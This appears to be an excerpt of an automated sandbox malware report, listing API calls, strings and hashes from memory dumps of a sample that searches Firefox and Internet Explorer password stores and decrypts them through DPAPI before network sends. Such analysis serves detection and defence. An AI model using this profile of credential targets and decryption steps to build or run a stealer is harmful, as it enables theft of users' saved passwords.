                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: setsockopt
                                        • String ID: -
                                        • API String ID: 3981526788-2547889144
                                        • Opcode ID: 22746a7168d69b8109ca077f8fc10742cc71f821658c66c944c7ac124a6610b8
                                        • Instruction ID: bbd0023ac2a939cbfe046b2109bbe7e9d415700409587e3ed951090933a6a6ad
                                        • Opcode Fuzzy Hash: 22746a7168d69b8109ca077f8fc10742cc71f821658c66c944c7ac124a6610b8
                                        • Instruction Fuzzy Hash: A7D0A770550208B1D710D780CC03FDD72789F0070CF108271B710AA2E0E7F5AB58934D
                                        APIs
                                        • CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F9E
                                        • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401FAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateFileHandle
                                        • String ID:
                                        • API String ID: 3498533004-0
                                        • Opcode ID: d39dbdc18f269d9a0bd382627db96a0bb699d3389e345c30a75233596430591d
                                        • Instruction ID: da1f851b6ad41d0a585ef72bcc511cde3dd431a62df282b5eebc0926d26a6cdb
                                        • Opcode Fuzzy Hash: d39dbdc18f269d9a0bd382627db96a0bb699d3389e345c30a75233596430591d
                                        • Instruction Fuzzy Hash: D6E01A7239024536FB3156699C83F5A6A889711798F144132B641BE2D2D6F9ED80826C
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: .xml
                                        • API String ID: 1659193697-2937849440
                                        • Opcode ID: 489ffcfd401847843cefc8a62ea10b6385e71c95c027b560f80965a9363cf721
                                        • Instruction ID: 7e09cdc3a8f7f79bc3632fa6fd908551844e317328ecde9842e9c140ce417d91
                                        • Opcode Fuzzy Hash: 489ffcfd401847843cefc8a62ea10b6385e71c95c027b560f80965a9363cf721
                                        • Instruction Fuzzy Hash: 38F0D075800108FBDF11BB91DD42ACD7B76AB54318F108167F661711A1C7799B64EB48
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,004F00F0), ref: 004F066C
                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000104), ref: 004F0696
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904362145.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4f0000_pbfe2Xcxue.jbxd
                                        Similarity
                                        • API ID: AllocCreateFileVirtual
                                        • String ID:
                                        • API String ID: 1475775534-0
                                        • Opcode ID: 9438f341d30f8f78cd6decd17021b4ac48a7e562a6c7731b6aeff07552287e57
                                        • Instruction ID: 27e08a18c4f9120f0e09bbd93438d9f1af402ae73c7d1c31c0fe22ccc6a9f73c
                                        • Opcode Fuzzy Hash: 9438f341d30f8f78cd6decd17021b4ac48a7e562a6c7731b6aeff07552287e57
                                        • Instruction Fuzzy Hash: 3AE012B168038477FB305B208C4BFDA3924BB85F55F250104FB957D1C0C5F5A4558659
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: gethostbynameinet_addr
                                        • String ID:
                                        • API String ID: 1594361348-0
                                        • Opcode ID: 4af54c856358ab5859669df15d29a23ec61f65fca54c693a60d65231e7306ada
                                        • Instruction ID: e90bf7aad7193c0f9ceff3a40ebfa48e022e408382a647374a6f110568813f44
                                        • Opcode Fuzzy Hash: 4af54c856358ab5859669df15d29a23ec61f65fca54c693a60d65231e7306ada
                                        • Instruction Fuzzy Hash: 15E0BF312049069BCAA09A2DCD4585576A5AF163BC7104323F135DB3F5D7B8D8817749
                                        APIs
                                        • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040306E
                                        • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403079
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: closesocketconnect
                                        • String ID:
                                        • API String ID: 1323028321-0
                                        • Opcode ID: 4a3d46b335ad1dc7c761c5e6745edc1ae4ad93bd71932cf7df1ea9112c5718f0
                                        • Instruction ID: 1a8dd54e177803be8ae45eb96966ffd09ab341fbcad4af9d4012cdf4e923bf73
                                        • Opcode Fuzzy Hash: 4a3d46b335ad1dc7c761c5e6745edc1ae4ad93bd71932cf7df1ea9112c5718f0
                                        • Instruction Fuzzy Hash: 77D0C971A05204A9DB109BFA5CC2ABEA65CAB1032CF104A3FB662F51C5D2BC95849629
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004109C5
                                        • ExitProcess.KERNEL32(00000000), ref: 004109E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountExitProcessTick
                                        • String ID:
                                        • API String ID: 232575682-0
                                        • Opcode ID: 1fb56e7f38b998b2e1eb3b5a2befc5f99440c3229eeafce3aae42334c08131da
                                        • Instruction ID: e06f08177bb24a491aabbe78cfef0d9db75e46451ece7cabc6a11cb80e53ab46
                                        • Opcode Fuzzy Hash: 1fb56e7f38b998b2e1eb3b5a2befc5f99440c3229eeafce3aae42334c08131da
                                        • Instruction Fuzzy Hash: A2C04CF077859894F15471B215763EA100347E1708F54801FA2062519B5EEC14D1121F
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocal
                                        • String ID: $@
                                        • API String ID: 3494564517-1661285546
                                        • Opcode ID: 7c197561a88981a5446c7d804c8b2ae8a1a1457808afe291ff0403a180310e7a
                                        • Instruction ID: b47a04dfb405f7ff4a48ab368aa1ab22973e96827417dfb1fea54adad4bbf39c
                                        • Opcode Fuzzy Hash: 7c197561a88981a5446c7d804c8b2ae8a1a1457808afe291ff0403a180310e7a
                                        • Instruction Fuzzy Hash: 19B092B120030826E280A649D803F5A728C9B20B8CF008021BB44A6282C9B8F89042AD
                                        APIs
                                          • Part of subcall function 004030D3: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403118
                                        • recv.WSOCK32(?,?,00000800,00000000), ref: 004031EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: recvselect
                                        • String ID:
                                        • API String ID: 741273618-0
                                        • Opcode ID: 7e4c82b7df45fcab2328d309c128bb5c64b2ce6dc47c1f4668f06aa1f5c4c85a
                                        • Instruction ID: df4997655309bb799330812faf78ae7617fd6b67ef43b9658c25c6cf22e5507f
                                        • Opcode Fuzzy Hash: 7e4c82b7df45fcab2328d309c128bb5c64b2ce6dc47c1f4668f06aa1f5c4c85a
                                        • Instruction Fuzzy Hash: F2019632604209BBDB209E50CC41BAB3B9DBB18346F14457BB912E91C0D7B8DB469B89
                                        APIs
                                        • send.WSOCK32(?,?,00000000,00000000), ref: 004030AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: e0fc911766141696de52452919b4824b3bb434a5f5890549219eb4aa70d6853e
                                        • Instruction ID: e834c9600f7e1f41c88b418a2028c1d051d4e2a67dccc2874989ccf6031adb31
                                        • Opcode Fuzzy Hash: e0fc911766141696de52452919b4824b3bb434a5f5890549219eb4aa70d6853e
                                        • Instruction Fuzzy Hash: 4EF0E5323162089BEB104F15DC45B9F3B58E790799F10043BFE01A72C4D3BEDA918358
                                        APIs
                                        • select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403118
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: select
                                        • String ID:
                                        • API String ID: 1274211008-0
                                        • Opcode ID: d6d87b1d255557b6a3ce414a09b82a7ba2530fd90c2d245eb8d16836291047cc
                                        • Instruction ID: 860f4d7612bd9a785f460a4ed282619bb121214c5a508a6a1dd9894722f68a6a
                                        • Opcode Fuzzy Hash: d6d87b1d255557b6a3ce414a09b82a7ba2530fd90c2d245eb8d16836291047cc
                                        • Instruction Fuzzy Hash: A2F0307560411CAEDB20CF50CC41BEABB7CEB18328F1042A2E558EA1D0E7F59BD48F95
                                        APIs
                                        • WSAStartup.WSOCK32(00000101,?), ref: 0040393C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: 86f92290934c130aae8d239850853b02c716a860cf956909a831475ea64517db
                                        • Instruction ID: 4852e405930d01820976a5792c930ccf955b73523dc535e9c389921a37e96620
                                        • Opcode Fuzzy Hash: 86f92290934c130aae8d239850853b02c716a860cf956909a831475ea64517db
                                        • Instruction Fuzzy Hash: 19B092316542082AE610A6958C439E6729C9744B0CF4401A52B69D22C2EAE9EAD046EA
                                        APIs
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0040101D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID:
                                        • API String ID: 2244384528-0
                                        • Opcode ID: 32b2249c0e5039061dbadc90455b537bea0a25c7daf71954061d8c42792f4c30
                                        • Instruction ID: cc5a57047fceea2a8ca6012e4f3b9f734970da0fe3ff9bcb04c274512a565ec7
                                        • Opcode Fuzzy Hash: 32b2249c0e5039061dbadc90455b537bea0a25c7daf71954061d8c42792f4c30
                                        • Instruction Fuzzy Hash: 45A022323B820030EE00ABC08C03FCCAA030B20B8CF008002B3082C0C2C0FAE0E0C338
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,0000072C,00001000,00000040), ref: 004E00CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904351309.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_pbfe2Xcxue.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 58531ec5487ff46779e154e5da2004d808305740356bac15d1023e4c08c3c533
                                        • Instruction ID: 23be1165357db6c0bc4e23b76a1edd076a9d899792ddd1199eb26d75c1fc3d62
                                        • Opcode Fuzzy Hash: 58531ec5487ff46779e154e5da2004d808305740356bac15d1023e4c08c3c533
                                        • Instruction Fuzzy Hash: AC31F52510C6C266CB03AB718908A46FF8ABF4731AB1DC6C4E5ED6A953C76DE4A0C790
                                        APIs
                                        • LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeLocal
                                        • String ID:
                                        • API String ID: 2826327444-0
                                        • Opcode ID: 4aaf6a95b2b4547edd5fc12a07d5fa921451d3b4788a3dcca5d43dd86f83d86d
                                        • Instruction ID: 36159a681d5b5c47b03bffa30afd2bf4eab4d9358c60d8a54bac3beee167eddb
                                        • Opcode Fuzzy Hash: 4aaf6a95b2b4547edd5fc12a07d5fa921451d3b4788a3dcca5d43dd86f83d86d
                                        • Instruction Fuzzy Hash: B0C09B7110060C55D7025E65D90979A79D45B11389F4181356505645B2F7F8D5F0D5D8
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00409B66
                                        • lstrcmpiA.KERNEL32(00414900,?), ref: 00409B93
                                        • lstrcmpiA.KERNEL32(00414902,?), ref: 00409BB0
                                        • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409D46
                                        • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409D59
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                          • Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                          • Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                        • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                        • API String ID: 3040542784-1405255088
                                        • Opcode ID: 5c77b75c859a3a3c8655eec3dae5a0f926864f1b2f9ff64128f26a67e44dd565
                                        • Instruction ID: 2b4c0fda24d83b44dc08ccd6ab7c6b19b71cc99feb65ad9903762619ff66c9a9
                                        • Opcode Fuzzy Hash: 5c77b75c859a3a3c8655eec3dae5a0f926864f1b2f9ff64128f26a67e44dd565
                                        • Instruction Fuzzy Hash: CF5160B1941209BADF21AF61DD06FEE7769AF50308F1040BBB908710F2D67D9DE09A5D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: explorer.exe
                                        • API String ID: 0-3187896405
                                        • Opcode ID: 3ab78f934fcaf868473b84f21beff55e01278a47ee7d2d22a7c1ce598486e9b5
                                        • Instruction ID: 245b9f8b9273737babcd6378abc80a44e6c96fdbf52f0b37ee05213faa98bba1
                                        • Opcode Fuzzy Hash: 3ab78f934fcaf868473b84f21beff55e01278a47ee7d2d22a7c1ce598486e9b5
                                        • Instruction Fuzzy Hash: 71418F72940219ABDF229FA0CD49BEE7A75AF04304F0441B7A504B51E1DBB89ED1DF58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $diamond
                                        • API String ID: 0-3606237843
                                        • Opcode ID: c15af7d19d6f95a7f84986e1a1d75180473bdb2ee32f895e676627024aa6a21b
                                        • Instruction ID: 2265d41e95d6c3fd5ea7938403a4911ca94aeb945ce9fe3e7a188991b421d247
                                        • Opcode Fuzzy Hash: c15af7d19d6f95a7f84986e1a1d75180473bdb2ee32f895e676627024aa6a21b
                                        • Instruction Fuzzy Hash: F9516C75A00208EFEF119FA4CD46BDEBA75EB44308F148066E510A91E2D7F98AD0DF68
                                        APIs
                                          • Part of subcall function 0040A56D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5A6
                                          • Part of subcall function 0040A56D: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5AF
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A84F
                                        • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A8D9
                                        • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A8F8
                                        • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A917
                                        • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A930
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A976
                                        • LocalFree.KERNEL32(?), ref: 0040A9A3
                                        • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A9CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                                        • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                        • API String ID: 2957877119-3076635702
                                        • Opcode ID: 7e51257053c96a58961f265a6878f88c233dc879845eef77a664f47e0f7efbdd
                                        • Instruction ID: d0b50bfead2f42566bd9c65e426667afbf0b5bfdd59cdd306150fa7cd1c027c5
                                        • Opcode Fuzzy Hash: 7e51257053c96a58961f265a6878f88c233dc879845eef77a664f47e0f7efbdd
                                        • Instruction Fuzzy Hash: CA41FB7150021DEADF219F50CC42FDA77B9BF04304F0484A6B684B5090DB799AE5DFD9
                                        APIs
                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BFAB
                                        • LocalFree.KERNEL32(00000000,?), ref: 0040BFE6
                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C027
                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C035
                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C043
                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C051
                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C05F
                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C06D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                        • String ID: ftp://$http://$https://
                                        • API String ID: 3968356742-2804853444
                                        • Opcode ID: 7e1870fcc2b2c2654e989bb7a4941a9d8bc32d277c570f3d10b05c9e10ea6460
                                        • Instruction ID: 926805cedc70b954b79b01b1a7ecc7b4b4811d3c67d73157f2bf5b5d26860602
                                        • Opcode Fuzzy Hash: 7e1870fcc2b2c2654e989bb7a4941a9d8bc32d277c570f3d10b05c9e10ea6460
                                        • Instruction Fuzzy Hash: F0510732910209FBCF11ABD1DC81EEE7B7AEF48305F14813AF511B21A1DB799A91DB58
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00408C99
                                        • lstrcmpiA.KERNEL32(00414900,?), ref: 00408CC2
                                        • lstrcmpiA.KERNEL32(00414902,?), ref: 00408CDF
                                        • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 00408D86
                                        • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 00408D99
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                          • Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                          • Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                        • String ID: *.*$\*.*
                                        • API String ID: 3040542784-1692270452
                                        • Opcode ID: 5e419986c46963edbd489a6238c02946ee884d372549de3b54a9c74f0383bbfc
